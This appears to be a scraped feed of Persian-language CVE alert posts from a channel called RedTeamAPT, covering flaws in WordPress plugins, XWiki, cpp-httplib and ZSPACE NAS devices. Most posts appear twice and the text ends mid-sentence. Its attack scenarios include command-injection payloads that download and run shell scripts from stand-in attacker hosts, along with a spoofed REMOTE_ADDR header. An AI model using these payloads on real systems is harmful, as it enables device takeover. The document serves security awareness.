🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری: CVE-2025-12879
افزونه وردپرس: User Generator and Importer
---
Vulnerability Description:
آسیبپذیری از نوع Cross-Site Request Forgery (CSRF) در افزونه
این نقص به مهاجمان اجازه میدهد تا درخواستهای جعلی را از طرف یک مدیر احراز هویت شده به وبسایت ارسال کنند.
Impact:
مهاجم غیر احراز هویت شده میتواند با سوءاستفاده از این آسیبپذیری، یک حساب کاربری جدید با بالاترین سطح دسترسی (Administrator) بر روی وبسایت هدف ایجاد کند. این امر به معنای در اختیار گرفتن کامل کنترل وبسایت، دسترسی به تمام اطلاعات کاربران، و امکان اجرای کدهای مخرب بر روی سرور است.
به طور خلاصه، این آسیبپذیری میتواند منجر به تسخیر کامل وبسایت (Full Site Compromise) شود.
Scenario:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک صفحه وب یا لینک مخرب را آماده میکند که حاوی یک فرم جعلی برای ارسال درخواست به تابع آسیبپذیر در افزونه است. این فرم دستور ایجاد یک کاربر جدید با نام کاربری و رمز عبور دلخواه و سطح دسترسی
۲. مهاجم با استفاده از روشهای مهندسی اجتماعی (مانند ارسال ایمیل فیشینگ یا پیام در شبکههای اجتماعی)، مدیر وبسایت را ترغیب میکند تا بر روی لینک مخرب کلیک کند.
۳. زمانی که مدیر (که در همان مرورگر به پنل مدیریت وردپرس خود وارد شده است) روی لینک کلیک میکند، مرورگر او به صورت خودکار و پنهانی، درخواست جعلی را به همراه کوکیهای احراز هویت به وبسایت ارسال میکند.
۴. از آنجایی که افزونه فاقد مکانیزم دفاعی CSRF (بررسی Nonce) است، درخواست را معتبر تلقی کرده و یک حساب کاربری جدید با دسترسی کامل مدیر برای مهاجم ایجاد میکند، بدون اینکه مدیر وبسایت متوجه این فرآیند شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری: CVE-2025-12879
افزونه وردپرس: User Generator and Importer
---
Vulnerability Description:
آسیبپذیری از نوع Cross-Site Request Forgery (CSRF) در افزونه
User Generator and Importer برای وردپرس شناسایی شده است. این ضعف امنیتی نسخههای 1.2.2 و پایینتر را تحت تأثیر قرار میدهد. مشکل اصلی ناشی از عدم وجود اعتبارسنجی توکنهای امنیتی (Nonce) در عملکرد "Import Using CSV File" است.این نقص به مهاجمان اجازه میدهد تا درخواستهای جعلی را از طرف یک مدیر احراز هویت شده به وبسایت ارسال کنند.
Impact:
مهاجم غیر احراز هویت شده میتواند با سوءاستفاده از این آسیبپذیری، یک حساب کاربری جدید با بالاترین سطح دسترسی (Administrator) بر روی وبسایت هدف ایجاد کند. این امر به معنای در اختیار گرفتن کامل کنترل وبسایت، دسترسی به تمام اطلاعات کاربران، و امکان اجرای کدهای مخرب بر روی سرور است.
به طور خلاصه، این آسیبپذیری میتواند منجر به تسخیر کامل وبسایت (Full Site Compromise) شود.
Scenario:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک صفحه وب یا لینک مخرب را آماده میکند که حاوی یک فرم جعلی برای ارسال درخواست به تابع آسیبپذیر در افزونه است. این فرم دستور ایجاد یک کاربر جدید با نام کاربری و رمز عبور دلخواه و سطح دسترسی
administrator را در خود جای داده است.۲. مهاجم با استفاده از روشهای مهندسی اجتماعی (مانند ارسال ایمیل فیشینگ یا پیام در شبکههای اجتماعی)، مدیر وبسایت را ترغیب میکند تا بر روی لینک مخرب کلیک کند.
۳. زمانی که مدیر (که در همان مرورگر به پنل مدیریت وردپرس خود وارد شده است) روی لینک کلیک میکند، مرورگر او به صورت خودکار و پنهانی، درخواست جعلی را به همراه کوکیهای احراز هویت به وبسایت ارسال میکند.
۴. از آنجایی که افزونه فاقد مکانیزم دفاعی CSRF (بررسی Nonce) است، درخواست را معتبر تلقی کرده و یک حساب کاربری جدید با دسترسی کامل مدیر برای مهاجم ایجاد میکند، بدون اینکه مدیر وبسایت متوجه این فرآیند شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-65036
🟠 Risk Level: HIGH (Score: 8.3)
شرح آسیبپذیری:
آسیبپذیری با شناسه
نقطه ضعف اصلی در این است که ماکروی مربوطه، کدهای نوشته شده با زبان قالب (Template Language) به نام
نسخههای تحت تاثیر: تمامی نسخهها قبل از
نسخه اصلاح شده:
---
تاثیرات:
تاثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این آسیبپذیری به مهاجم اجازه میدهد تا دستورات دلخواه خود را بر روی سروری که XWiki روی آن میزبانی میشود، اجرا کند.
عواقب احتمالی این حمله عبارتند از:
- کنترل کامل سرور: مهاجم میتواند کنترل کامل سرور را در دست بگیرد.
- سرقت اطلاعات حساس: دسترسی به پایگاه داده، فایلهای پیکربندی و اطلاعات محرمانه کاربران.
- نصب بدافزار: امکان نصب بدافزار، باجافزار یا ابزارهای جاسوسی بر روی سرور.
- حملات بعدی: استفاده از سرور قربانی به عنوان پایگاهی برای حمله به سایر سیستمها در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند از این آسیبپذیری به شرح زیر بهرهبرداری کند:
۱. ابتدا، مهاجم یک نمونه XWiki را که از نسخه آسیبپذیر افزونه Remote Macros استفاده میکند، شناسایی میکند.
۲. سپس، مهاجم (حتی با یک حساب کاربری با سطح دسترسی پایین یا به عنوان کاربر مهمان در صورت پیکربندی نادرست) یک صفحه جدید ایجاد کرده یا یک صفحه موجود را ویرایش میکند.
۳. در این صفحه، مهاجم یک ماکروی آسیبپذیر را قرار داده و در پارامترهای آن یا در صفحه جزئیات مرتبط با آن، یک قطعه کد
۴. هنگامی که این صفحه توسط هر کاربری (یا خود مهاجم) مشاهده و رندر میشود، ماکروی آسیبپذیر بدون هیچگونه بررسی امنیتی، کد
۵. در نتیجه، دستور مخرب بر روی سرور با سطح دسترسی پروسه XWiki اجرا شده و مهاجم به سرور نفوذ میکند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.3)
شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-65036 در افزونه Remote Macros پلتفرم XWiki شناسایی شده است. این افزونه که برای انتقال محتوا از Confluence به XWiki استفاده میشود، دارای یک نقص امنیتی حیاتی است.نقطه ضعف اصلی در این است که ماکروی مربوطه، کدهای نوشته شده با زبان قالب (Template Language) به نام
Velocity را بدون بررسی سطح دسترسی کاربر اجرا میکند. این بدان معناست که یک کاربر غیرمجاز میتواند با تزریق کد مخرب در صفحات جزئیات (details pages)، آن را بر روی سرور اجرا کند.نسخههای تحت تاثیر: تمامی نسخهها قبل از
1.27.1نسخه اصلاح شده:
1.27.1---
تاثیرات:
تاثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این آسیبپذیری به مهاجم اجازه میدهد تا دستورات دلخواه خود را بر روی سروری که XWiki روی آن میزبانی میشود، اجرا کند.
عواقب احتمالی این حمله عبارتند از:
- کنترل کامل سرور: مهاجم میتواند کنترل کامل سرور را در دست بگیرد.
- سرقت اطلاعات حساس: دسترسی به پایگاه داده، فایلهای پیکربندی و اطلاعات محرمانه کاربران.
- نصب بدافزار: امکان نصب بدافزار، باجافزار یا ابزارهای جاسوسی بر روی سرور.
- حملات بعدی: استفاده از سرور قربانی به عنوان پایگاهی برای حمله به سایر سیستمها در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند از این آسیبپذیری به شرح زیر بهرهبرداری کند:
۱. ابتدا، مهاجم یک نمونه XWiki را که از نسخه آسیبپذیر افزونه Remote Macros استفاده میکند، شناسایی میکند.
۲. سپس، مهاجم (حتی با یک حساب کاربری با سطح دسترسی پایین یا به عنوان کاربر مهمان در صورت پیکربندی نادرست) یک صفحه جدید ایجاد کرده یا یک صفحه موجود را ویرایش میکند.
۳. در این صفحه، مهاجم یک ماکروی آسیبپذیر را قرار داده و در پارامترهای آن یا در صفحه جزئیات مرتبط با آن، یک قطعه کد
Velocity مخرب تزریق میکند. این کد برای اجرای یک دستور سیستمی طراحی شده است. برای مثال، کدی که یک reverse shell به سرور مهاجم برقرار میکند.۴. هنگامی که این صفحه توسط هر کاربری (یا خود مهاجم) مشاهده و رندر میشود، ماکروی آسیبپذیر بدون هیچگونه بررسی امنیتی، کد
Velocity تزریق شده را اجرا میکند.۵. در نتیجه، دستور مخرب بر روی سرور با سطح دسترسی پروسه XWiki اجرا شده و مهاجم به سرور نفوذ میکند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66570
🔴 Risk Level: CRITICAL (Score: 10.0)
تحلیل آسیبپذیری CVE-2025-66570 در کتابخانه cpp-httplib
📝 توصیف آسیبپذیری:
یک آسیبپذیری از نوع تزریق هدر (Header Injection) در کتابخانه C++ به نام
این مشکل زمانی رخ میدهد که کتابخانه ابتدا هدرهای ارسالی توسط مهاجم را پردازش کرده و سپس بدون حذف مقادیر تکراری، اطلاعات صحیح و داخلی خود را با همین نامها به لیست هدرها اضافه میکند. از آنجایی که توابع مربوطه مانند
💥 تأثیرات:
این آسیبپذیری میتواند منجر به چندین تهدید امنیتی جدی شود:
🔸 جعل آدرس IP (IP Spoofing): مهاجم میتواند سرور را فریب دهد تا تصور کند درخواست از یک آدرس IP معتبر یا داخلی (مانند
🔸 دور زدن مکانیزمهای امنیتی (Authorization Bypass): اگر سیستمهای کنترل دسترسی یا فایروال برنامه کاربردی (WAF) بر اساس آدرس IP کاربر تصمیمگیری کنند، مهاجم با جعل یک IP مجاز میتواند این محدودیتها را دور بزند.
🔸 مسمومسازی لاگها (Log Poisoning): مهاجم میتواند اطلاعات نادرست و گمراهکننده را در لاگهای سرور ثبت کند. این کار تحلیل امنیتی و ردیابی فعالیتهای مخرب را بسیار دشوار میسازد و ممکن است باعث پنهان ماندن حملات دیگر شود.
🎭 سناریو حمله:
فرض کنید یک وب اپلیکیشن با استفاده از نسخه آسیبپذیر
1. مهاجم یک درخواست HTTP به سمت سرور ارسال میکند.
2. در این درخواست، هدر زیر را به صورت دستی اضافه میکند:
3. سرور درخواست را دریافت میکند. ابتدا هدر جعلی مهاجم را پردازش میکند و سپس آدرس IP واقعی مهاجم را (مثلاً
4. اپلیکیشن برای بررسی دسترسی، آدرس IP کاربر را با تابع
5. این تابع اولین مقدار، یعنی
6. در نتیجه، سیستم کنترل دسترسی تصور میکند که درخواست از یک منبع داخلی و معتبر آمده و به مهاجم اجازه ورود به پنل مدیریت را میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 10.0)
تحلیل آسیبپذیری CVE-2025-66570 در کتابخانه cpp-httplib
📝 توصیف آسیبپذیری:
یک آسیبپذیری از نوع تزریق هدر (Header Injection) در کتابخانه C++ به نام
cpp-httplib (نسخههای قبل از 0.27.0) شناسایی شده است. مهاجم میتواند با ارسال هدرهای HTTP خاصی مانند REMOTE_ADDR، REMOTE_PORT، LOCAL_ADDR و LOCAL_PORT در درخواست خود، اطلاعات متادیتای سرور را دستکاری کند.این مشکل زمانی رخ میدهد که کتابخانه ابتدا هدرهای ارسالی توسط مهاجم را پردازش کرده و سپس بدون حذف مقادیر تکراری، اطلاعات صحیح و داخلی خود را با همین نامها به لیست هدرها اضافه میکند. از آنجایی که توابع مربوطه مانند
get_header_value اولین مقدار پیدا شده برای یک هدر را برمیگردانند، مقدار جعلی تزریق شده توسط مهاجم به جای مقدار واقعی و معتبر سرور مورد استفاده قرار میگیرد. این تکنیک به Header Shadowing معروف است.💥 تأثیرات:
این آسیبپذیری میتواند منجر به چندین تهدید امنیتی جدی شود:
🔸 جعل آدرس IP (IP Spoofing): مهاجم میتواند سرور را فریب دهد تا تصور کند درخواست از یک آدرس IP معتبر یا داخلی (مانند
127.0.0.1) ارسال شده است، در حالی که منبع واقعی درخواست جای دیگری است.🔸 دور زدن مکانیزمهای امنیتی (Authorization Bypass): اگر سیستمهای کنترل دسترسی یا فایروال برنامه کاربردی (WAF) بر اساس آدرس IP کاربر تصمیمگیری کنند، مهاجم با جعل یک IP مجاز میتواند این محدودیتها را دور بزند.
🔸 مسمومسازی لاگها (Log Poisoning): مهاجم میتواند اطلاعات نادرست و گمراهکننده را در لاگهای سرور ثبت کند. این کار تحلیل امنیتی و ردیابی فعالیتهای مخرب را بسیار دشوار میسازد و ممکن است باعث پنهان ماندن حملات دیگر شود.
🎭 سناریو حمله:
فرض کنید یک وب اپلیکیشن با استفاده از نسخه آسیبپذیر
cpp-httplib ساخته شده و یک پنل مدیریت دارد که دسترسی به آن فقط برای آدرس IP محلی (127.0.0.1) مجاز است.1. مهاجم یک درخواست HTTP به سمت سرور ارسال میکند.
2. در این درخواست، هدر زیر را به صورت دستی اضافه میکند:
REMOTE_ADDR: 127.0.0.13. سرور درخواست را دریافت میکند. ابتدا هدر جعلی مهاجم را پردازش میکند و سپس آدرس IP واقعی مهاجم را (مثلاً
198.51.100.10) با همین نام هدر به لیست اضافه میکند.4. اپلیکیشن برای بررسی دسترسی، آدرس IP کاربر را با تابع
get_header_value("REMOTE_ADDR") استعلام میکند.5. این تابع اولین مقدار، یعنی
127.0.0.1 را که توسط مهاجم تزریق شده، برمیگرداند.6. در نتیجه، سیستم کنترل دسترسی تصور میکند که درخواست از یک منبع داخلی و معتبر آمده و به مهاجم اجازه ورود به پنل مدیریت را میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14106
🟠 Risk Level: HIGH (Score: 8.8)
📜 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع تزریق دستور (Command Injection) با شناسه
این ضعف امنیتی در تابع
💥 تأثیر:
مهاجمی که از این آسیبپذیری بهرهبرداری کند، میتواند به طور کامل کنترل دستگاه را در دست بگیرد. این حمله به صورت از راه دور و بدون نیاز به احراز هویت قابل اجرا است.
پیامدهای اصلی عبارتند از:
• اجرای کد از راه دور (RCE) و دسترسی کامل به سیستم.
• سرقت، حذف یا رمزنگاری تمامی دادههای ذخیره شده بر روی دستگاه.
• نصب بدافزار (مانند باجافزار یا تروجان) بر روی دستگاه.
• استفاده از دستگاه به عنوان نقطهای برای نفوذ به سایر سیستمهای موجود در شبکه داخلی (Pivoting).
🎭 سناریو حمله:
۱. مهاجم یک دستگاه ZSPACE Q2C آسیبپذیر را در اینترنت یا شبکه داخلی شناسایی میکند.
۲. سپس، یک درخواست HTTP POST دستکاریشده به آدرس زیر ارسال میکند:
۳. در بدنه این درخواست، مقدار پارامتر
۴. وب سرور دستگاه، این ورودی را بدون اعتبارسنجی دریافت کرده و دستورات تزریق شده توسط مهاجم را با سطح دسترسی خود اجرا میکند. در نتیجه، مهاجم موفق به اجرای کد از راه دور و به دست گرفتن کنترل دستگاه میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
📜 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع تزریق دستور (Command Injection) با شناسه
CVE-2025-14106 در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است.این ضعف امنیتی در تابع
zfilev2_api.CloseSafe واقع در مسیر /v2/file/safe/close وجود دارد. مهاجم از راه دور میتواند با ارسال یک درخواست HTTP POST و دستکاری پارامتر safe_dir، دستورات دلخواه خود را بر روی سیستم عامل دستگاه اجرا کند. اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و فروشنده محصول هیچ پاسخی جهت رفع آن ارائه نکرده است.💥 تأثیر:
مهاجمی که از این آسیبپذیری بهرهبرداری کند، میتواند به طور کامل کنترل دستگاه را در دست بگیرد. این حمله به صورت از راه دور و بدون نیاز به احراز هویت قابل اجرا است.
پیامدهای اصلی عبارتند از:
• اجرای کد از راه دور (RCE) و دسترسی کامل به سیستم.
• سرقت، حذف یا رمزنگاری تمامی دادههای ذخیره شده بر روی دستگاه.
• نصب بدافزار (مانند باجافزار یا تروجان) بر روی دستگاه.
• استفاده از دستگاه به عنوان نقطهای برای نفوذ به سایر سیستمهای موجود در شبکه داخلی (Pivoting).
🎭 سناریو حمله:
۱. مهاجم یک دستگاه ZSPACE Q2C آسیبپذیر را در اینترنت یا شبکه داخلی شناسایی میکند.
۲. سپس، یک درخواست HTTP POST دستکاریشده به آدرس زیر ارسال میکند:
https://[TARGET_IP]/v2/file/safe/close۳. در بدنه این درخواست، مقدار پارامتر
safe_dir با دستورات مخرب سیستمعامل ترکیب میشود. برای مثال، برای دانلود و اجرای یک اسکریپت مخرب، مهاجم میتواند مقداری شبیه به این را ارسال کند:{"safe_dir": "; wget https://malicious.server/payload -O /tmp/p; chmod +x /tmp/p; /tmp/p"}۴. وب سرور دستگاه، این ورودی را بدون اعتبارسنجی دریافت کرده و دستورات تزریق شده توسط مهاجم را با سطح دسترسی خود اجرا میکند. در نتیجه، مهاجم موفق به اجرای کد از راه دور و به دست گرفتن کنترل دستگاه میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14107
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری | هشدار امنیتی
شناسه:
---
📄 شرح آسیبپذیری:
یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه
این آسیبپذیری در تابع
حمله به صورت از راه دور قابل اجرا بوده و کد بهرهبرداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.
💥 سطح تأثیر:
تأثیر این آسیبپذیری بسیار بالا (Critical) ارزیابی میشود. بهرهبرداری موفقیتآمیز میتواند منجر به موارد زیر گردد:
- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخشهای شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.
🎭 سناریوی حمله:
۱. مهاجم با استفاده از ابزارهای اسکن، دستگاههای ZSPACE Q2C آسیبپذیر که در اینترنت قابل دسترس هستند را شناسایی میکند.
۲. سپس یک درخواست
۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریقشده را مستقیماً بر روی سیستمعامل اجرا میکند.
۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری | هشدار امنیتی
شناسه:
CVE-2025-14107---
📄 شرح آسیبپذیری:
یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه
1.1.0210050 شناسایی شده است.این آسیبپذیری در تابع
zfilev2_api.SafeStatus که از طریق ارسال درخواست HTTP POST به مسیر /v2/file/safe/status قابل دسترس است، وجود دارد. مهاجم میتواند با دستکاری پارامتر safe_dir و تزریق دستورات مخرب، کنترل کامل سیستمعامل دستگاه را به دست گیرد.حمله به صورت از راه دور قابل اجرا بوده و کد بهرهبرداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.
💥 سطح تأثیر:
تأثیر این آسیبپذیری بسیار بالا (Critical) ارزیابی میشود. بهرهبرداری موفقیتآمیز میتواند منجر به موارد زیر گردد:
- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخشهای شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.
🎭 سناریوی حمله:
۱. مهاجم با استفاده از ابزارهای اسکن، دستگاههای ZSPACE Q2C آسیبپذیر که در اینترنت قابل دسترس هستند را شناسایی میکند.
۲. سپس یک درخواست
HTTP POST دستکاریشده به سرور NAS ارسال میکند. در این درخواست، پارامتر safe_dir حاوی دستورات مخرب سیستمعامل است (برای مثال، دستوری برای دانلود و اجرای یک درب پشتی یا Backdoor).۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریقشده را مستقیماً بر روی سیستمعامل اجرا میکند.
۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14108
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14108
توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل
مهاجم از راه دور میتواند با دستکاری پارامتر
---
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسهی وب سرور دستگاه میدهد. این موضوع میتواند منجر به نتایج فاجعهباری شود، از جمله:
- کنترل کامل دستگاه و دسترسی به تمامی فایلهای ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باجافزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسیهای آتی.
- استفاده از دستگاه آلوده به عنوان نقطهای برای نفوذ و حمله به سایر دستگاههای موجود در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند با دنبال کردن مراحل زیر از این آسیبپذیری بهرهبرداری کند:
۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاههای
۲. سپس، یک درخواست
۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا میکند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS میشود.
۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و میتواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14108
توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل
ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است. این ضعف امنیتی در تابع zfilev2_api.OpenSafe واقع در مسیر /v2/file/safe/open وجود دارد که از طریق درخواستهای HTTP POST قابل دسترسی است.مهاجم از راه دور میتواند با دستکاری پارامتر
safe_dir، دستورات دلخواه خود را بر روی سیستمعامل دستگاه هدف اجرا کند. کد بهرهبرداری (Exploit) برای این آسیبپذیری به صورت عمومی منتشر شده و فروشنده محصول علیرغم اطلاعرسانی، هیچ واکنشی نشان نداده است.---
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسهی وب سرور دستگاه میدهد. این موضوع میتواند منجر به نتایج فاجعهباری شود، از جمله:
- کنترل کامل دستگاه و دسترسی به تمامی فایلهای ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باجافزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسیهای آتی.
- استفاده از دستگاه آلوده به عنوان نقطهای برای نفوذ و حمله به سایر دستگاههای موجود در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند با دنبال کردن مراحل زیر از این آسیبپذیری بهرهبرداری کند:
۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاههای
ZSPACE Q2C NAS آسیبپذیر را که به صورت عمومی در دسترس هستند، شناسایی میکند.۲. سپس، یک درخواست
HTTP POST مخرب به اندپوینت /v2/file/safe/open ارسال میکند. در این درخواست، مقدار پارامتر safe_dir به گونهای دستکاری میشود که شامل دستورات سیستمعامل باشد. برای مثال:safe_dir=any_directory_name; wget https://attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا میکند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS میشود.
۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و میتواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12673
🔴 Risk Level: CRITICAL (Score: 9.8)
🐞 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه
این آسیبپذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایلها در تابع
💥 تأثیر:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل سرور را به دست آورد.
سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایلهای پیکربندی.
- نصب بدافزار، باجافزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وبسایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسیهای پایدار (Backdoor) برای حملات آینده.
🎬 سناریو:
یک سناریوی حمله میتواند به شرح زیر باشد:
۱. مهاجم با ابزارهای اسکن خودکار، وبسایتهای وردپرسی را که از نسخه آسیبپذیر پلاگین `Flex QR Code Generator` استفاده میکنند، شناسایی میکند.
۲. سپس، یک فایل مخرب مانند یک وبشل (Web Shell) با پسوند
۳. مهاجم با ارسال یک درخواست دستکاریشده به تابع آسیبپذیر
۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز میکند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا میکند و کنترل کامل آن را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
🐞 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه
CVE-2025-12673 در پلاگین Flex QR Code Generator برای وردپرس شناسایی شده است. تمام نسخههای این پلاگین تا نسخه 1.2.6 (شامل این نسخه) تحت تأثیر این ضعف امنیتی قرار دارند.این آسیبپذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایلها در تابع
update_qr_code() است. این نقص به مهاجمان احراز هویت نشده اجازه میدهد تا هر نوع فایلی (مانند یک وبشل مخرب) را بر روی سرور سایت آسیبپذیر آپلود کنند.💥 تأثیر:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل سرور را به دست آورد.
سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایلهای پیکربندی.
- نصب بدافزار، باجافزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وبسایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسیهای پایدار (Backdoor) برای حملات آینده.
🎬 سناریو:
یک سناریوی حمله میتواند به شرح زیر باشد:
۱. مهاجم با ابزارهای اسکن خودکار، وبسایتهای وردپرسی را که از نسخه آسیبپذیر پلاگین `Flex QR Code Generator` استفاده میکنند، شناسایی میکند.
۲. سپس، یک فایل مخرب مانند یک وبشل (Web Shell) با پسوند
.php آماده میکند. این فایل حاوی کدهایی است که به مهاجم اجازه اجرای دستورات روی سرور را میدهد.۳. مهاجم با ارسال یک درخواست دستکاریشده به تابع آسیبپذیر
